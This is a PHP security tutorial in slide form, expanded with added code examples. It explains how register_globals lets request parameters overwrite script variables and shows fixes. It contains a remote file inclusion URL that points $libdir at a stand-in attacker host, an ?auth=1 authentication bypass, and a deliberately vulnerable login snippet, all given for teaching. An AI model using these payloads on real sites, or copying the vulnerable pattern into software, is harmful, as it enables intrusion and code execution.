
PHP Security: register_globals How To Make It Difficult For Hackers To Set Variables.




1 PHP Security: register_globals How To Make It Difficult For Hackers To Set Variables

2 What Is register_globals?
- A php.ini directive (true/false). When on, PHP turns every environment, GET, POST, cookie, and server value into an ordinary global variable before the first line of your script runs.
- C.f. variables_order (EGPCS): it sets the order in which those five sources are registered, so a later source silently overwrites an earlier one when both supply the same name.

3 Examples (Part 1) For a form with fields named mytext and myhide (the form itself is not reproduced in this transcript): with register_globals turned on, PHP will automatically create the variables $mytext and $myhide and populate them with the values entered in the form, whether the form was submitted by GET or by POST.

4 Examples (Part 2) Similarly, with the URL…
http://example.com/index.php?george=jungle
…PHP will create $george for you and give it the value "jungle". Cookie, server, and environment variables such as $DOCUMENT_ROOT and $PHP_SELF are also automatically created and populated. Inside the script you cannot tell which of the five sources (EGPCS) a value came from.

5 Problems (Part 1)
<?php
// …some code…
include "$libdir/functions.inc";
// …more code…
?>
If the script does not itself assign $libdir before the include (for example because it expects a config file to have set it), the user can supply $libdir in the URL and the include pulls in a file of the attacker's choosing. With allow_url_fopen (and, from PHP 5.2, allow_url_include) enabled this is remote file inclusion, i.e. arbitrary PHP execution on the server, not merely cross-site scripting. E.g.:
http://example.com/index.php?libdir=http://badguy.se/hack
(PHP would then try to include http://badguy.se/hack/functions.inc.)

6 Problems (Part 2)
<?php
if ($auth == 1) {
    // do stuff for authorized users
} else {
    echo "Not authorized!";
}
?>
If $auth is assigned only when the login succeeds and left untouched otherwise, a user can set it in the URL and the injected value survives to the check, allowing unauthenticated use. E.g.:
http://example.com/index.php?auth=1
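The following is an added example, not code from the original slides. It traces the Problems (Part 2) pattern end to end: the function check_login, the $users array and the field names user and pass are hypothetical, and the first assignment to $auth stands in for what register_globals does before the script starts, so the script can be read on a PHP build that no longer has the directive.

```php
<?php
// Added example (not from the original slides). check_login, $users, user
// and pass are hypothetical names.
//
// With register_globals = On, the request
//     GET /index.php?auth=1
// makes PHP execute the equivalent of  $auth = "1";  before line 1 runs.
// The line below only stands in for that behaviour (PHP >= 5.4 has no
// register_globals); in the vulnerable era it would not be in the script.
$auth = isset($_GET['auth']) ? $_GET['auth'] : null;   // stand-in for register_globals

$users = array('alice' => 'correct horse');            // constructed sample credentials

function check_login($user, $pass)
{
    global $users;
    return isset($users[$user]) && $users[$user] === $pass;
}

$user = isset($_POST['user']) ? $_POST['user'] : '';
$pass = isset($_POST['pass']) ? $_POST['pass'] : '';

// VULNERABLE: $auth is assigned only on success. On failure, or when no
// credentials were sent at all, the value injected above is still there
// and "1" == 1 is true.
if (check_login($user, $pass)) {
    $auth = 1;
}
if ($auth == 1) {
    echo "vulnerable branch: authorized\n";      // reached with ?auth=1 and no login
} else {
    echo "vulnerable branch: Not authorized!\n";
}

// FIXED: give the variable a known value before its first read. Whatever
// register_globals injected is overwritten on every path, success or failure.
$auth = 0;
if (check_login($user, $pass)) {
    $auth = 1;
}
if ($auth === 1) {
    echo "fixed branch: authorized\n";
} else {
    echo "fixed branch: Not authorized!\n";      // reached with ?auth=1 and no login
}
```

The fix works because the script, not the request, now has the last write to $auth before the comparison; it is the same reason the "check all variables" advice on the next slide is hard to apply to $auth, since there is nothing to check once the value is already in place.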

7 Solutions (Part 1)
- Don't let anyone see your code? The idea: if they don't know which variable names to set, they can't crack your script. This is security through obscurity and does not work well, if at all (variable names leak through error messages, shared components and plain guessing).
- Check all variables before using them. Good practice anyway, but sometimes hard to check (e.g. $auth: the script cannot distinguish an injected 1 from one it set itself).

8 Solutions (Part 2)
- Turn off register_globals! It is off by default in PHP 4.2.0 and later anyway. (The directive was deprecated in PHP 5.3.0 and removed in PHP 5.4.0, so on a current PHP it no longer exists at all.)
- Use the track_vars arrays instead: $_GET $_POST $_SERVER $_FILES $_ENV $_COOKIE
- track_vars is always on in PHP 4.0.3 and later; the $_* superglobals above exist from PHP 4.1.0 (older code uses $HTTP_GET_VARS, $HTTP_POST_VARS, etc.).
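An added example, not from the original slides, of how a practitioner would enforce the "turn it off" advice: the configuration lines as comments, and a guard for code that might still land on a pre-5.4 host where the directive is on. The function name unregister_globals and the use of error_log are choices made for this example.

```php
<?php
// Added example (not from the original slides): make sure register_globals
// is really off, with a defensive fallback for hosts (PHP < 5.4) where it
// may still be on. Nothing here is needed on PHP >= 5.4.
//
// Preferred: turn it off at the configuration level.
//   php.ini:                 register_globals = Off
//   Apache .htaccess or      php_flag register_globals off
//   <VirtualHost>:           (.htaccess needs AllowOverride Options or All)
//
// ini_set('register_globals', ...) at runtime does NOT work: the setting is
// PHP_INI_PERDIR, and the variables are registered before the script starts.

// Defensive fallback: if the directive is on anyway, remove every global
// variable that register_globals created from the EGPCS sources, leaving
// the superglobal arrays themselves untouched. Returns how many were removed.
function unregister_globals()
{
    if (!ini_get('register_globals')) {
        return 0;                               // off, or directive no longer exists
    }
    // Never unset these: they are the arrays we want people to use.
    $protected = array('GLOBALS', '_GET', '_POST', '_COOKIE', '_REQUEST',
                       '_SERVER', '_ENV', '_FILES', '_SESSION');
    $sources = array($_ENV, $_GET, $_POST, $_COOKIE, $_SERVER, $_FILES);
    if (isset($_SESSION) && is_array($_SESSION)) {
        $sources[] = $_SESSION;                 // session vars are registered too
    }
    $removed = 0;
    foreach ($sources as $source) {
        foreach ($source as $name => $unused) {
            if (in_array($name, $protected, true)) {
                continue;                       // would break the superglobals
            }
            if (array_key_exists($name, $GLOBALS)) {
                unset($GLOBALS[$name]);
                $removed++;
            }
        }
    }
    return $removed;
}

// Run this before any other code, e.g. as the first statement of the front
// controller or through auto_prepend_file, so nothing reads a stale global.
$n = unregister_globals();
if ($n > 0) {
    error_log("register_globals is On; removed $n injected globals");
}
```

The guard only helps if it runs first; any code executed before it (including included config files that read bare globals) sees the injected values.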

9 Solution Examples (Part 1) With register_globals turned off, PHP will populate $_POST['mytext'] and $_POST['myhide'] for the form above. If the form's method was GET, the values are in $_GET instead.

10 Solution Examples (Part 2) If a value is set in the URL…
http://example.com/index.php?george=jungle
…it becomes $_GET['george'] = "jungle".
- Post-method variables are in $_POST
- Get-method and URL variables are in $_GET
- Server variables are in $_SERVER
- Uploaded files are in $_FILES
- Cookie values are in $_COOKIE
- Environment settings are in $_ENV
You know exactly which source each value came from. (Avoid $_REQUEST for the same reason: it merges GET, POST and cookie data according to request_order, or variables_order on older PHP, and brings the ambiguity back.)
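An added example, not from the original slides, of reading the same inputs through the superglobals with the source named explicitly and each value validated before use. The helper input(), the patterns, the parameter names page and module defaults are hypothetical; george and mytext are the names used on the slides.

```php
<?php
// Added example (not from the original slides): explicit-source input
// handling with a whitelist check, instead of trusting a bare $george.
// The helper name input() and the patterns are hypothetical.

// Fetch $name from exactly one source array ($_GET, $_POST, ...), reject it
// unless it is a string matching $pattern, and fall back to $default.
function input($source, $name, $pattern, $default = null)
{
    if (!isset($source[$name]) || !is_string($source[$name])) {
        return $default;                        // missing, or ?name[]=x (array)
    }
    $value = $source[$name];
    // \z rather than $: $ would also accept a trailing newline.
    return preg_match($pattern, $value) ? $value : $default;
}

// http://example.com/index.php?george=jungle
$george = input($_GET, 'george', '/^[a-z]{1,32}\z/', 'nobody');

// A page number from the query string, a short text field from a POSTed form.
$page   = (int) input($_GET,  'page',   '/^[0-9]{1,4}\z/', '1');
$mytext = input($_POST, 'mytext', '/^[\x20-\x7e]{0,200}\z/', '');

// Server and cookie data stay in their own arrays, so the origin is never in
// doubt: $_SERVER['DOCUMENT_ROOT'] was set by the web server, while a
// $_COOKIE['DOCUMENT_ROOT'] (if one exists) came from the client.
$docroot = isset($_SERVER['DOCUMENT_ROOT']) ? $_SERVER['DOCUMENT_ROOT'] : '';

// What NOT to do: $_REQUEST merges GET, POST and COOKIE (order set by
// request_order, or variables_order on older PHP), so a cookie named george
// can silently win over the URL value. That is the register_globals
// ambiguity in a new coat.
// $george = $_REQUEST['george'];

printf("george=%s page=%d mytext=%s docroot=%s\n",
       htmlspecialchars($george), $page, htmlspecialchars($mytext),
       htmlspecialchars($docroot));
```

Two details matter in practice: the is_string() check rejects the ?name[]=x trick that turns a scalar into an array, and the default is applied on any validation failure so later code never sees an unvalidated value.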

11 Use define For Path Names
- If you have to set directory paths in variables, use constants instead: define('LIBDIR', '/path/to/lib');
- Pathnames are especially dangerous in variables because an attacker who controls them can make include or require load an arbitrary local or remote file (local/remote file inclusion, i.e. code execution), which is a far worse outcome than cross-site scripting.
- A constant is not a variable, so register_globals cannot create or overwrite it, and once set a constant cannot be redefined; that makes it far more robust against accidental resets and against hack attempts.
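An added example, not from the original slides, applying define() to the include from Problems (Part 1) and going one step further than the slide: when part of the file name must still come from the request, the constant alone is not enough. LIBDIR's value /srv/app/lib, the file functions.inc, the modules directory, the parameter module and the helper module_path() are all hypothetical.

```php
<?php
// Added example (not from the original slides). /srv/app/lib,
// functions.inc, the modules directory, ?module= and module_path() are
// hypothetical.

// A constant is not a variable: register_globals cannot create or overwrite
// it, and once defined it cannot be redefined.
define('LIBDIR', '/srv/app/lib');

// A second define() of the same name fails (returns false and emits a
// notice, a warning on PHP 8) instead of silently changing the path.
$redefined = define('LIBDIR', '/tmp/evil');     // false; LIBDIR unchanged
assert($redefined === false && LIBDIR === '/srv/app/lib');

// The include from the slide, with the directory fixed at definition time.
// ?LIBDIR=http://badguy.se/hack has no effect: LIBDIR is a constant, and a
// global variable $LIBDIR that register_globals might create is never read.
include LIBDIR . '/functions.inc';              // hypothetical file

// If part of the file name comes from the request (?module=foo), the
// constant protects only the directory: "../" and URLs in the name must
// still be rejected. Returns the resolved path, or false.
function module_path($module)
{
    if (!is_string($module) || !preg_match('/^[a-z0-9_]{1,32}\z/', $module)) {
        return false;                           // rejects "..", "/", "http://"
    }
    $base = realpath(LIBDIR . '/modules');
    $path = realpath(LIBDIR . '/modules/' . $module . '.inc');
    // realpath() resolves symlinks and "..", so anything that does not sit
    // under $base escaped the directory (or does not exist).
    if ($base === false || $path === false || strpos($path, $base . '/') !== 0) {
        return false;
    }
    return $path;
}

$module = isset($_GET['module']) ? $_GET['module'] : '';
$file = module_path($module);
if ($file !== false) {
    include $file;
} else {
    echo "Unknown module\n";
}
```

The character whitelist does the real work; the realpath() containment check is defence in depth for the case where the whitelist is later loosened, because it fails closed on a symlink or a path that resolves outside the modules directory.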

12 References
- http://www.php.net/manual/en/security.registerglobals.php
- http://www.php.net/manual/en/security.php
- http://www.zend.com/zend/art/art-oertli.php
- http://www.securereality.com.au/studyinscarlet.txt

